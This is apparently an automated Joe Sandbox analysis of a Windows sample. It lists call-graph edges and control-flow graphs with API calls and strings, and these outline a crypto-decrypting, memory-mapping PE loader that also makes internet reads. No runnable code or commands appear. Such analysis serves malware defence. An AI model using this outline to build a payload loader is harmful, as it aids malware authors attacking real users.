38083->38084 38085 4016da __cftof 38084->38085 38085->37745 38087 407c62 38086->38087 38095 407c9e 38086->38095 38300 409170 6 API calls 38087->38300 38089 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38091 407cb0 38089->38091 38090 407c6c 38090->38095 38301 409482 28 API calls 38090->38301 38091->37753 38093 407c94 38302 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38093->38302 38095->38089 38097 407c0e 38096->38097 38098 407bdc 38096->38098 38100 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38097->38100 38303 409170 6 API calls 38098->38303 38102 407c20 38100->38102 38101 407be6 38101->38097 38304 409482 28 API calls 38101->38304 38102->37773 38104 407c04 38305 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38104->38305 38107 407b4d 38106->38107 38115 407b92 38106->38115 38306 409170 6 API calls 38107->38306 38108 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38110 407ba5 38108->38110 38110->37791 38111 407b57 38111->38115 38307 409482 28 API calls 38111->38307 38113 407b88 38308 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38113->38308 38115->38108 38117 408572 38116->38117 38118 408a60 27 API calls 38117->38118 38119 4061a3 38118->38119 38120 4085c0 38119->38120 38121 4085d9 38120->38121 38122 4085ed __InternalCxxFrameHandler 38121->38122 38309 402740 27 API calls 3 library calls 38121->38309 38122->37831 38310 408880 38124->38310 38126 4061d0 38126->37850 38128 4084bb 38127->38128 38129 4084c2 38128->38129 38130 408514 38128->38130 38131 4084f5 38128->38131 38129->37995 38138 408509 __InternalCxxFrameHandler 38130->38138 38332 401600 27 API calls 4 library calls 38130->38332 38132 40854a 38131->38132 38133 4084fc 38131->38133 38333 401600 27 API calls 3 library calls 38132->38333 38331 401600 27 API calls 4 library calls 38133->38331 38137 408502 38137->38138 38139 40c26f 25 API calls 38137->38139 38138->37995 38140 408554 38139->38140 38141->37652 38142->37652 38143->37652 38144->37652 38146 408ae8 38145->38146 38149 408a7a __InternalCxxFrameHandler 38145->38149 38334 408b10 27 API calls 3 library calls 38146->38334 38148 408afa 38148->37652 38149->37652 38151 401db2 38150->38151 38151->38151 38152 402470 27 API calls 38151->38152 38153 401dc5 38152->38153 38154 402470 27 API calls 38153->38154 38155 401e8d __InternalCxxFrameHandler 38154->38155 38335 40c34c 38155->38335 38158 402033 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38159 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38158->38159 38161 402057 38159->38161 38160 401fc3 38160->38158 38162 402062 38160->38162 38161->37652 38163 40c26f 25 API calls 38162->38163 38164 402067 38163->38164 38165 401d60 39 API calls 38164->38165 38167 40f00b 23 API calls 38166->38167 38168 4037d7 38167->38168 38364 4082a0 27 API calls 3 library calls 38168->38364 38170 4038a1 38170->37676 38172 403844 38172->38170 38365 40f021 37 API calls _unexpected 38172->38365 38366 408740 27 API calls 3 library calls 38172->38366 38174->37684 38176->37668 38177->37685 38178->37706 38179->37722 38180->37739 38181->37670 38182->37689 38183->37704 38184->37725 38185->37739 38186->37662 38187->37699 38188->37716 38189->37731 38190->37750 38191->37764 38192->37803 38193->37802 38194->37803 38195->37700 38196->37736 38197->37752 38198->37766 38199->37784 38200->37806 38201->37803 38202->37862 38203->37728 38204->37737 38205->37770 38206->37789 38207->37808 38208->37835 38209->37861 38210->37883 38211->37904 38212->37946 38213->37953 38214->37762 38215->37769 38216->37814 38217->37839 38218->37866 38219->37892 38220->37910 38221->37935 38222->37813 38223->37869 38224->37896 38225->37915 38226->37940 38227->37957 38228->37971 38229->37868 38230->37918 38231->37944 38232->37959 38233->37975 38234->37996 38235->37920 38236->37960 38237->37980 38238->37991 38239->38004 38240->37996 38241->37838 38242->38012 38243->38023 38245->38021 38246->38032 38247->38047 38248->38051 38250 40f197 38249->38250 38251 40f1ac 38249->38251 38257 40c339 14 API calls _free 38250->38257 38256 40f1a7 __alldvrm 38251->38256 38259 411df2 6 API calls _unexpected 38251->38259 38253 40f19c 38258 40c25f 25 API calls __cftof 38253->38258 38256->38056 38257->38253 38258->38256 38259->38256 38261 41121a 38260->38261 38262 411214 38260->38262 38266 411220 SetLastError 38261->38266 38290 411db0 6 API calls _unexpected 38261->38290 38289 411d71 6 API calls _unexpected 38262->38289 38265 411238 38265->38266 38267 41123c 38265->38267 38273 4112b4 38266->38273 38274 405618 Sleep 38266->38274 38291 411a65 14 API calls 2 library calls 38267->38291 38269 411248 38271 411250 38269->38271 38272 411267 38269->38272 38292 411db0 6 API calls _unexpected 38271->38292 38293 411db0 6 API calls _unexpected 38272->38293 38296 40fad9 37 API calls __FrameHandler3::FrameUnwindToState 38273->38296 38274->37640 38278 41125e 38285 411ac2 _free 14 API calls 38278->38285 38280 411273 38281 411277 38280->38281 38282 411288 38280->38282 38294 411db0 6 API calls _unexpected 38281->38294 38295 41102b 14 API calls _unexpected 38282->38295 38287 411264 38285->38287 38286 411293 38288 411ac2 _free 14 API calls 38286->38288 38287->38266 38288->38287 38289->38261 38290->38265 38291->38269 38292->38278 38293->38280 38294->38278 38295->38286 38297->38064 38298->38067 38299->38069 38300->38090 38301->38093 38302->38095 38303->38101 38304->38104 38305->38097 38306->38111 38307->38113 38308->38115 38309->38122 38311 4088c3 38310->38311 38312 408a50 38311->38312 38313 408990 38311->38313 38317 4088c8 __InternalCxxFrameHandler 38311->38317 38329 4016a0 27 API calls std::_Xinvalid_argument 38312->38329 38318 4089c5 38313->38318 38319 4089eb 38313->38319 38315 408a55 38330 401600 27 API calls 3 library calls 38315->38330 38317->38126 38318->38315 38321 4089d0 38318->38321 38326 4089dd __InternalCxxFrameHandler 38319->38326 38328 401600 27 API calls 4 library calls 38319->38328 38320 4089d6 38323 40c26f 25 API calls 38320->38323 38320->38326 38327 401600 27 API calls 4 library calls 38321->38327 38325 408a5f 38323->38325 38326->38126 38327->38320 38328->38326 38330->38320 38331->38137 38332->38138 38333->38137 38334->38148 38338 41144f 38335->38338 38342 411463 38338->38342 38339 411467 38355 401ed8 InternetOpenA 38339->38355 38357 40c339 14 API calls _free 38339->38357 38341 411491 38358 40c25f 25 API calls __cftof 38341->38358 38342->38339 38344 4114a1 38342->38344 38342->38355 38359 40c369 37 API calls 2 library calls 38344->38359 38346 4114ad 38347 4114b7 38346->38347 38351 4114ce 38346->38351 38360 417a24 25 API calls 2 library calls 38347->38360 38349 411550 38349->38355 38361 40c339 14 API calls _free 38349->38361 38350 4115a5 38350->38355 38363 40c339 14 API calls _free 38350->38363 38351->38349 38351->38350 38354 411599 38362 40c25f 25 API calls __cftof 38354->38362 38355->38160 38357->38341 38358->38355 38359->38346 38360->38355 38361->38354 38362->38355 38363->38355 38364->38172 38365->38172 38366->38172 38368 40eeb7 38367->38368 38369 40eec9 38367->38369 38395 409906 GetModuleHandleW 38368->38395 38379 40ed50 38369->38379 38373 40eebc 38373->38369 38396 40ef4f GetModuleHandleExW 38373->38396 38374 4096cf 38374->37620 38377 40ef0c 38380 40ed5c __FrameHandler3::FrameUnwindToState 38379->38380 38402 40f28c RtlEnterCriticalSection 38380->38402 38382 40ed66 38403 40edbc 38382->38403 38384 40ed73 38407 40ed91 38384->38407 38387 40ef0d 38412 41366f GetPEB 38387->38412 38390 40ef3c 38393 40ef4f __FrameHandler3::FrameUnwindToState 3 API calls 38390->38393 38391 40ef1c GetPEB 38391->38390 38392 40ef2c GetCurrentProcess TerminateProcess 38391->38392 38392->38390 38394 40ef44 ExitProcess 38393->38394 38395->38373 38397 40ef91 38396->38397 38398 40ef6e GetProcAddress 38396->38398 38400 40eec8 38397->38400 38401 40ef97 FreeLibrary 38397->38401 38399 40ef83 38398->38399 38399->38397 38400->38369 38401->38400 38402->38382 38404 40edc8 __FrameHandler3::FrameUnwindToState 38403->38404 38406 40ee29 __FrameHandler3::FrameUnwindToState 38404->38406 38410 410940 14 API calls __FrameHandler3::FrameUnwindToState 38404->38410 38406->38384 38411 40f2d4 RtlLeaveCriticalSection 38407->38411 38409 40ed7f 38409->38374 38409->38387 38410->38406 38411->38409 38413 413689 38412->38413 38414 40ef17 38412->38414 38416 411c94 5 API calls _unexpected 38413->38416 38414->38390 38414->38391 38416->38414 38417 99cd47 38418 99cd69 38417->38418 38419 99cd78 RegOpenKeyA 38418->38419 38420 99cd9f RegOpenKeyA 38418->38420 38419->38420 38421 99cd95 38419->38421 38422 99cdbc 38420->38422 38421->38420 38423 99ce00 GetNativeSystemInfo 38422->38423 38424 99ce0b 38422->38424 38423->38424

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 402c70-402c92 1 402c94-402cbb SetLastError call 402920 call 408ec2 0->1 2 402cbc-402cc4 0->2 4 402cf1-402cff 2->4 5 402cc6 2->5 6 402d01-402d28 SetLastError call 402920 call 408ec2 4->6 7 402d29-402d36 4->7 9 402ccb-402cf0 call 402920 SetLastError call 408ec2 5->9 11 402d38-402d3d 7->11 12 402d3f-402d48 7->12 11->9 17 402d54-402d5a 12->17 18 402d4a-402d4f 12->18 21 402d66-402d73 17->21 22 402d5c-402d61 17->22 18->9 26 402d94-402db7 GetNativeSystemInfo 21->26 27 402d75 21->27 22->9 28 402dc3-402ddb VirtualAlloc 26->28 29 402db9-402dbe 26->29 30 402d77-402d92 27->30 31 402e03-402e1e GetProcessHeap HeapAlloc 28->31 32 402ddd-402ded VirtualAlloc 28->32 29->9 30->26 30->30 34 402e20-402e2d VirtualFree 31->34 35 402e34-402e7a 31->35 32->31 33 402def-402dfc call 402920 32->33 33->31 34->35 37 402e7c-402e7e SetLastError 35->37 38 402e9e-402ee6 VirtualAlloc call 40a3e0 35->38 41 402e84-402e9d call 4033d0 call 408ec2 37->41 44 402eec-402eef 38->44 45 402f9f-402fa8 38->45 48 402ef0-402ef5 44->48 49 40302d 45->49 50 402fae-402fb5 45->50 53 402ef7-402f03 48->53 54 402f38-402f40 48->54 52 403032-40303e call 402a80 49->52 55 402fb7-402fb9 50->55 56 402fbb-402fcd 50->56 52->41 66 403044-403067 52->66 58 402f84-402f96 53->58 59 402f05-402f1f 53->59 54->37 61 402f46-402f59 call 402bf0 54->61 55->52 56->49 60 402fcf 56->60 58->48 63 402f9c 58->63 59->41 74 402f25-402f36 call 40aa10 59->74 64 402fd0-402fe5 60->64 65 402f5b-402f60 61->65 63->45 68 402fe7-402fea 64->68 69 40301e-403028 64->69 65->41 70 402f66-402f7b call 40a3e0 65->70 72 403069-40306e 66->72 73 40307c-40309c 66->73 75 402ff0-403001 68->75 69->64 71 40302a 69->71 92 402f7e-402f81 70->92 71->49 79 403070-403073 72->79 80 403075-403077 72->80 82 4030a2-4030a8 73->82 83 403165-403171 call 402950 73->83 74->92 76 403003-40300b 75->76 77 40300e-40301c 75->77 76->77 77->69 77->75 79->73 80->73 86 403079 80->86 88 4030b0-4030c9 82->88 91 403176-403178 83->91 86->73 89 4030e3-4030e6 88->89 90 4030cb-4030ce 88->90 96 403123-40312f 89->96 97 4030e8-4030ef 89->97 93 4030d0-4030d3 90->93 94 4030d5-4030d8 90->94 91->41 95 40317e-40318a 91->95 92->58 98 4030dd-4030e0 93->98 94->89 99 4030da 94->99 100 4031b3-4031b8 95->100 101 40318c-403195 95->101 104 403131 96->104 105 403137-403140 96->105 102 403120 97->102 103 4030f1-4030f6 call 402950 97->103 98->89 99->98 108 40320a-403223 call 408ec2 100->108 109 4031ba-4031c3 100->109 101->100 106 403197-40319b 101->106 102->96 112 4030fb-4030fd 103->112 104->105 110 403143-40315f 105->110 106->100 111 40319d 106->111 114 4031f4-403209 call 408ec2 109->114 115 4031c5-4031ce 109->115 110->83 110->88 117 4031a0-4031af 111->117 112->41 118 403103-40311e 112->118 122 4031d0 115->122 123 4031da-4031f3 call 408ec2 115->123 126 4031b1 117->126 118->110 122->123 126->100
                                                    APIs
                                                    • SetLastError.KERNEL32(0000000D), ref: 00402C96
                                                    • SetLastError.KERNEL32(000000C1), ref: 00402CD8
                                                    Strings
                                                    • ERROR_OUTOFMEMORY!, xrefs: 00402DEF
                                                    • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
                                                    • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
                                                    • DOS header size is not valid!, xrefs: 00402D09
                                                    • Size is not valid!, xrefs: 00402C9C
                                                    • alignedImageSize != AlignValueUp!, xrefs: 00402DB9
                                                    • DOS header is not valid!, xrefs: 00402CC6
                                                    • @, xrefs: 00402C8F
                                                    • Section alignment invalid!, xrefs: 00402D5C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                    • API String ID: 1452528299-393758929
                                                    • Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                    • Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
                                                    • Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                    • Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 855 4034c0-403548 CryptAcquireContextW 856 40360a-403620 GetLastError CryptReleaseContext 855->856 857 40354e-40356c CryptCreateHash 855->857 858 403754-40375a 856->858 857->856 859 403572-403585 857->859 860 403784-4037a1 call 408ec2 858->860 861 40375c-403768 858->861 862 403588-40358d 859->862 865 40377a-403781 call 409027 861->865 866 40376a-403778 861->866 862->862 863 40358f-4035d6 call 409035 call 40e46b CryptHashData 862->863 879 4035e6-403608 CryptDeriveKey 863->879 880 4035d8-4035e1 GetLastError 863->880 865->860 866->865 869 4037a2-4037b5 call 40c26f 866->869 877 4037b7-4037be 869->877 878 4037c8 869->878 877->878 884 4037c0-4037c4 877->884 879->856 881 403625-403626 call 40e2bd 879->881 880->858 885 40362b-403677 call 40a3e0 call 409035 881->885 884->878 890 403748-40374e CryptDestroyKey 885->890 891 40367d-40368c 885->891 890->858 892 403692-40369b 891->892 893 4036a9-4036e4 call 40a3e0 CryptDecrypt 892->893 894 40369d-40369f 892->894 893->890 897 4036e6-403711 call 40a3e0 893->897 894->893 897->890 900 403713-403742 897->900 900->890 900->892
                                                    APIs
                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,44415B80), ref: 00403540
                                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
                                                    • _mbstowcs.LIBCMT ref: 004035B7
                                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
                                                    • GetLastError.KERNEL32 ref: 004035D8
                                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
                                                    • GetLastError.KERNEL32 ref: 0040360A
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
                                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
                                                    • CryptDestroyKey.ADVAPI32(?), ref: 0040374E
                                                    Strings
                                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                    • API String ID: 3642901890-63410773
                                                    • Opcode ID: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                    • Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
                                                    • Opcode Fuzzy Hash: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                    • Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 921 402950-402967 922 4029a9-4029bd call 408ec2 921->922 923 402969-402972 921->923 924 402974-402979 923->924 925 4029be-402a00 VirtualProtect 923->925 924->922 928 40297b-402980 924->928 925->922 927 402a02-402a24 GetLastError FormatMessageA 925->927 930 402a27-402a2c 927->930 931 402982-40298a 928->931 932 402996-4029a3 call 402c10 928->932 930->930 933 402a2e-402a7a LocalAlloc call 4028e0 OutputDebugStringA LocalFree * 2 call 408ec2 930->933 931->932 934 40298c-402994 931->934 937 4029a5 932->937 934->932 936 4029a8 934->936 936->922 937->936
                                                    APIs
                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
                                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
                                                    • LocalFree.KERNEL32(00000000), ref: 00402A62
                                                    • LocalFree.KERNEL32(?), ref: 00402A67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                    • String ID: %s: %s$Error protecting memory page
                                                    • API String ID: 839691724-1484484497
                                                    • Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                    • Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
                                                    • Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                    • Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1026 401880-401943 InternetSetFilePointer InternetReadFile 1028 40197d-4019c0 call 40aa10 HttpQueryInfoA 1026->1028 1032 401d25-401d53 call 408ec2 1028->1032 1033 4019c6-4019f9 CoCreateInstance 1028->1033 1033->1032 1035 4019ff-401a06 1033->1035 1035->1032 1037 401a0c-401a3a 1035->1037 1038 401a40-401a45 1037->1038 1038->1038 1039 401a47-401b08 call 402470 MultiByteToWideChar call 409035 MultiByteToWideChar 1038->1039 1044 401b10-401b19 1039->1044 1044->1044 1045 401b1b-401bd9 call 402310 call 408ed0 1044->1045 1052 401c0a-401c0c 1045->1052 1053 401bdb-401bea 1045->1053 1056 401c12-401c19 1052->1056 1057 401d19-401d20 1052->1057 1054 401c00-401c07 call 409027 1053->1054 1055 401bec-401bfa 1053->1055 1054->1052 1055->1054 1059 401d56-401d5b call 40c26f 1055->1059 1056->1057 1058 401c1f-401c93 call 409035 1056->1058 1057->1032 1067 401c95-401ca3 1058->1067 1068 401cff-401d15 call 408ed0 1058->1068 1070 401ca5-401cdb call 409035 call 4014b0 call 408ed0 1067->1070 1071 401cdd 1067->1071 1068->1057 1074 401ce0-401cfc call 4014b0 1070->1074 1071->1074 1074->1068
                                                    APIs
                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
                                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: FileInternet$PointerRead
                                                    • String ID: text
                                                    • API String ID: 3197321146-999008199
                                                    • Opcode ID: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                    • Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
                                                    • Opcode Fuzzy Hash: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                    • Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1295 40ef0d-40ef1a call 41366f 1298 40ef3c-40ef48 call 40ef4f ExitProcess 1295->1298 1299 40ef1c-40ef2a GetPEB 1295->1299 1299->1298 1300 40ef2c-40ef36 GetCurrentProcess TerminateProcess 1299->1300 1300->1298
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,771ADF80,?,00000000,?,004114AD), ref: 0040EF2F
                                                    • TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,771ADF80,?,00000000,?,004114AD), ref: 0040EF36
                                                    • ExitProcess.KERNEL32 ref: 0040EF48
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                    • Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
                                                    • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                    • Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1303 f8a45e-f8a477 1304 f8a479-f8a47b 1303->1304 1305 f8a47d 1304->1305 1306 f8a482-f8a48e CreateToolhelp32Snapshot 1304->1306 1305->1306 1307 f8a49e-f8a4ab Module32First 1306->1307 1308 f8a490-f8a496 1306->1308 1309 f8a4ad-f8a4ae call f8a11d 1307->1309 1310 f8a4b4-f8a4bc 1307->1310 1308->1307 1315 f8a498-f8a49c 1308->1315 1313 f8a4b3 1309->1313 1313->1310 1315->1304 1315->1307
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00F8A486
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 00F8A4A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2703351422.0000000000F89000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F89000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_f89000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: fe9a354a6e53602ccab1c58fa517ce99da74b7932e37eba1853efebda3c5f36b
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: 7EF0F6316007106BEB207BF8AC8DBEE72E8EF48335F10016AE642914D0DBB4EC059B62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: emp$mixtwo
                                                    • API String ID: 3472027048-2390925073
                                                    • Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                    • Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
                                                    • Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                    • Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 129 4055c0-405667 call 40f20b call 40f042 Sleep call 402470 call 4038c0 138 405691-4056d2 call 402470 call 4038c0 129->138 139 405669-405675 129->139 151 405701-40570b 138->151 152 4056d4-4056e0 138->152 141 405687-40568e call 409027 139->141 142 405677-405685 139->142 141->138 142->141 145 4056f2 call 40c26f 142->145 150 4056f7-4056fe call 409027 145->150 150->151 156 405718-40571e 151->156 157 40570d-405716 151->157 152->150 154 4056e2-4056f0 152->154 154->145 154->150 158 405721-405723 156->158 157->158 159 405725-40572d 158->159 160 40574d-40576c call 408690 158->160 161 405730-405748 call 40f158 159->161 166 405a91-405ad8 call 408470 * 3 call 4064d0 call 408190 call 4022d0 call 408260 call 402200 160->166 167 405772-40580b call 40aa10 call 409035 call 40aa10 160->167 168 40574a 161->168 217 405bab-405bd6 call 406770 call 408150 call 4022d0 call 408260 call 402200 166->217 218 405ade-405aef call 4021b0 166->218 181 40580d-405821 call 409170 167->181 182 40584f-405856 167->182 168->160 181->182 191 405823-40584c call 409482 call 409126 181->191 186 405882-4058a0 182->186 187 405858-40587d 182->187 190 4058a3-4058a8 186->190 187->186 190->190 193 4058aa-405922 call 402470 call 408a60 190->193 191->182 206 405951-405969 193->206 207 405924-405930 193->207 211 405970-40598d 206->211 209 405932-405940 207->209 210 405947-40594e call 409027 207->210 209->210 213 405942 call 40c26f 209->213 210->206 215 4059a2-4059b0 call 401d60 211->215 216 40598f-405998 call 408ed0 211->216 213->210 231 405a45-405a4c Sleep 215->231 232 4059b6-4059dc 215->232 216->215 273 405caa-405cd5 call 406b10 call 408150 call 4022d0 call 408260 call 402200 217->273 274 405bdc-405c53 call 4067f0 call 408150 call 4022d0 call 402250 call 402200 call 406870 call 408170 call 4022d0 call 402250 call 402200 call 4068f0 call 4081b0 call 4022d0 call 408260 call 402200 217->274 229 405af1-405b49 call 406550 call 4081b0 call 4022d0 call 402250 call 402200 call 4065e0 call 408170 call 4022d0 call 402250 call 402200 call 408440 218->229 230 405b4e-405ba6 call 406660 call 4081b0 call 4022d0 call 402250 call 402200 call 4066f0 call 408170 call 4022d0 call 402250 call 402200 call 408440 218->230 344 406123-40627a call 4016b0 call 407c30 call 4081b0 call 4022d0 call 407bb0 call 408190 call 4022d0 call 407b10 call 4081e0 call 4022d0 call 408560 call 4085c0 call 408670 call 4085c0 call 408670 call 4085c0 call 402200 * 8 229->344 230->344 231->211 235 4059e0-4059e5 232->235 235->235 239 4059e7-405a0c call 402470 235->239 251 405a51-405a56 239->251 252 405a0e-405a11 239->252 260 405a58-405a5a 251->260 261 405a5c-405a5e 251->261 256 405a13-405a1a 252->256 257 405a6a-405a8c call 408440 call 402200 * 2 call 401710 252->257 256->231 265 405a1c-405a25 256->265 257->166 262 405a61-405a63 260->262 261->262 262->257 268 405a65 call 4037d0 262->268 271 405a27-405a35 265->271 272 405a3b-405a42 call 409027 265->272 268->257 271->145 271->272 272->231 326 405d99-405dc4 call 406eb0 call 408130 call 4022d0 call 408260 call 402200 273->326 327 405cdb-405d52 call 406b90 call 408150 call 4022d0 call 402250 call 402200 call 406c10 call 408170 call 4022d0 call 402250 call 402200 call 406c90 call 4081b0 call 4022d0 call 408260 